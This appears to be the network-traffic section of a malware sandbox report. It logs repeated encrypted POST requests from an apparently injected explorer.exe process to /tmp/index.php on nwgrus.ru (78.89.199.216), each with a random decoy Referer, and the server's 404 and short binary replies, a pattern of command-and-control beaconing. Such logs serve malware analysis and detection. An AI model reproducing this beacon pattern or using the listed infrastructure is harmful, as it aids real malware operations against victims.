Oct 1, 2024 15:17:47.488466978 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cmyvyfvgexcutc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: nwgrus.ru
Oct 1, 2024 15:17:47.488495111 CEST	362	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4a 54 fb e2 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuJTw6iLGWF]b%E>dt+MIh[ XvW#$m[DZFr+`h%+3-4evPJ=giWVPh
Oct 1, 2024 15:17:48.777230024 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49758	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:48.785304070 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gahrsvlvghgft.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: nwgrus.ru
Oct 1, 2024 15:17:48.785329103 CEST	336	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 28 0b ee eb Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu(gMf\p?{VqiKUgCH55BP8 'oQS"1%4`$0>jN$1q(mB:\|u}1GCRi
Oct 1, 2024 15:17:49.901345015 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49759	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:49.909883022 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dikpavspdxtej.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: nwgrus.ru
Oct 1, 2024 15:17:49.909920931 CEST	171	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 2d 45 ef fd Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu-E?PlYj+jP$,u0?Lh\|?B A#s{p U*1YK&j
Oct 1, 2024 15:17:50.981254101 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49760	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:50.997971058 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://arbcgjbfbud.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: nwgrus.ru
Oct 1, 2024 15:17:50.998014927 CEST	237	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 50 02 ff b8 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuP{[Xv6p4z)FJS]SpB@+bD#+ DD~5_kI:^@^+,9B^00Y"Y{
Oct 1, 2024 15:17:52.350409031 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49761	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:52.366202116 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dhkilweanmi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: nwgrus.ru
Oct 1, 2024 15:17:52.366219044 CEST	318	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 6c 29 b3 a0 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vul)DQ{G`6nU&l:X/B^K]?KvO)jQ_=<6Qv(?@DA.w@Hyp`R%Q
Oct 1, 2024 15:17:53.596154928 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:18:58.635438919 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rvuyclbvwkrg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: nwgrus.ru
Oct 1, 2024 15:18:58.635438919 CEST	240	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 46 b7 f5 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu[FDLcoB0)VVCdBW90N?SW-l>Bw\cIdI55c1;P;iXm :`df#
Oct 1, 2024 15:18:59.724081039 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:18:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:04.972449064 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jqtjcxypgpwnw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: nwgrus.ru
Oct 1, 2024 15:19:04.972641945 CEST	126	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 4f e4 b8 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuUOWAT\|BoQ[hM8e
Oct 1, 2024 15:19:06.035068989 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:10.695298910 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bcgwrufdvmvybh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Oct 1, 2024 15:19:10.695326090 CEST	200	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 3b cd ea Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu[;SwmIYtqOIY*?_I5rSUUJR7VJn]=o-N4~EZh T
Oct 1, 2024 15:19:11.806364059 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:16.951466084 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://whtwvxqhovvmi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: nwgrus.ru
Oct 1, 2024 15:19:16.951493979 CEST	349	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 58 a2 ad Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu4X[IrZdY{=Vjs5wzo ;<]M ZpFGL/!mc,P>_rL'Z4rHcx12Eff#[_)
Oct 1, 2024 15:19:18.036545992 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:22.190469027 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dyfmjstgfwohx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: nwgrus.ru
Oct 1, 2024 15:19:22.190493107 CEST	287	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 17 de bb Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu)2FjtLP<gamVX_n33d7F&bi2={!\:W&wo7I\!2t9vtav?c9iq<zd
Oct 1, 2024 15:19:23.665653944 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 1, 2024 15:19:23.665740013 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:28.939738989 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kwsghrqhqvcg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: nwgrus.ru
Oct 1, 2024 15:19:28.939748049 CEST	151	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 34 be b8 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuZ4uHddB1VPC>7pas7W?Z*qNT+gAjU
Oct 1, 2024 15:19:30.039554119 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:34.504096031 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ccplyqsjscjfnfid.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: nwgrus.ru
Oct 1, 2024 15:19:34.504173040 CEST	139	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 28 e3 f5 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu,(*}{O]Jr-'V#(Q#Q,C
Oct 1, 2024 15:19:35.601290941 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:41.191082954 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lqtuaptcsfhre.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: nwgrus.ru
Oct 1, 2024 15:19:41.191118002 CEST	331	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 38 ed ff Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu38ENL5\L5%i_\|AFTXb;X`(Ga5L/sE]{h[y\#@{H>p0Hc$\(O.
Oct 1, 2024 15:19:42.320750952 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:19:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:19:46.695696115 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dfuclvkubxc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: nwgrus.ru
Oct 1, 2024 15:19:46.695724010 CEST	316	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 54 b3 82 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vuITo`dvLo i(G?y:q< no'+7l}@ \|\Or:'zD6V:K>2@f@muCAeSV0g
